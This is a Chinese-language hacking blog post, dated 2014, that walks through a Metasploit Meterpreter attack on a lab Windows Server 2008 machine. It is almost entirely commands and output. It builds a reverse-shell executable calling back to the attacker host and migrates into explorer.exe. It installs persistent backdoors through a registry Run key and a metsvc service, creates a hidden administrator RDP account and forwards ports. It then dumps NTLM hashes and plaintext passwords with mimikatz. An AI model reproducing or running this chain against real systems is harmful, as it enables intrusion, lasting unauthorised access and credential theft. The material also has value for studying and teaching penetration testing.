记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Meterpreter初探

2014-04-10 21:35

攻击端:
OS:Kali
IP:192.168.111.129

被害端:
OS:Windows server 2008 (64位)
IP:192.168.111.133

首先在Kali上生成meterpreter的payload

root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe  
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}

接下来是配置监听

root@Kali:~# msfconsole 
msf > use multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...

然后在Windows2008上执行file.exe
返回一个meterpreter

[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800

meterpreter >

主题开始
(1).转移meterpreter到其他进程
在渗透过程中由于各种原因,当前meterpreter进程很容易被干掉,将meterpreter转移到系统常驻进程是个好主意

meterpreter > getuid  //查看当前权限
Server username: WIN-K30V5SI0PCEAdministrator
meterpreter > ps      //列出当前进程

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295                                
 4     0     System            x86_64  0                                         
 244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem32csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem32winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowsexplorer.exe
 2204  2428  mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe
 2312  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe
 2332  2044  file.exe          x86     1           WIN-K30V5SI0PCEAdministrator  C:UsersAdministratorDesktopfile.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe

meterpreter > migrate 2044 //迁移到PID为2044的explorer进程
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

验证

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295                                
 4     0     System            x86_64  0                                         
 244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            SystemRootSystem32smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:Windowssystem32svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:Windowssystem32csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:Windowssystem32winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:Windowssystem32svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:Windowssystem32svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowssystem32conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowssystem32cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:Windowssystem32svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:Windowssystem32sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:Windowssystem32svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:Windowssystem32svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowssystem32taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:Windowssystem32Dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsExplorer.EXE
 2312  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32svchost.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:Windowssystem32svchost.exe

如上所示file.exe进程已经没了。需要注意的是如果存在杀软的话可能会阻止进程注入
(2).测试是不是虚拟机

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

我的2008是装在VMWare上的
(3).安装后门
方法一:persistence方法

meterpreter > run  persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

执行

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
[+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
meterpreter >

现在退出服务器
重新配置监听器

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >

如图,反弹成功,这个被动型的后门在某些特殊的场合会是个不错的选择
方法二:metsvc

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:UsersADMINI~1AppDataLocalTempHzWbqqRpuBlxn...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >

metsvc后门安装成功,接下来是连接

root@Kali:~# msfconsole 
     ,           ,
    /             
   ((__---,,,---__))
      (_) O O (_)_________
          _ /            |
          o_o    M S F   | 
                  _____  |  *
                |||   WW|||
                |||     |||

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
+ -- --=[ 1239 exploits - 755 auxiliary - 207 post
+ -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler 
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >

方法三:
这个是类似于添加账户3389远程连接

meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: zero with Password: haizeiwang123_
[*]     Hiding user from Windows Login screen
[*]     Adding User: zero to local group 'Remote Desktop Users'
[*]     Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >

(4).端口转发
主机处于内网也是比较常见的,metasploit自带了一个端口转发工具

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >

接下来运行

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

即可连接
(5).获取密码
法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块
首先加载mimikatz模块
由于我的Windows 2008是64位的,所以先要转移到64位进程

meterpreter > ps

......
 2000  472   dllhost.exe        x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32dllhost.exe
 2264  1832  explorer.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Windowsexplorer.exe
 2292  2264  vmtoolsd.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Program FilesVMwareVMware Toolsvmtoolsd.exe
 2520  372   FfBoPtYGlNj.exe    x86     1           WIN-K30V5SI0PCEAdministrator  C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe
 2780  2256  winlogon.exe       x86_64  2           NT AUTHORITYSYSTEM            C:WindowsSystem32winlogon.exe
 3028  880   dwm.exe            x86_64  2           WIN-K30V5SI0PCEzero           C:WindowsSystem32dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

获取密码哈希

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;47971   NTLM                                          n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)

获取明文密码

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$ 
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$ 
0;47971   NTLM                                         
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE    
0;995     Negotiate  NT AUTHORITY     IUSR             
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_
0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_
0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_

相关文章参考:《初探Meterpreter(一)》《再谈SMB中继攻击

【via@coolhacker

知识来源: www.91ri.org/8625.html

阅读:223976 | 评论:0 | 标签:渗透技巧 meterpreter 内网渗透 渗透测试

想收藏或者和大家分享这篇好文章→复制链接地址

“Meterpreter初探”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词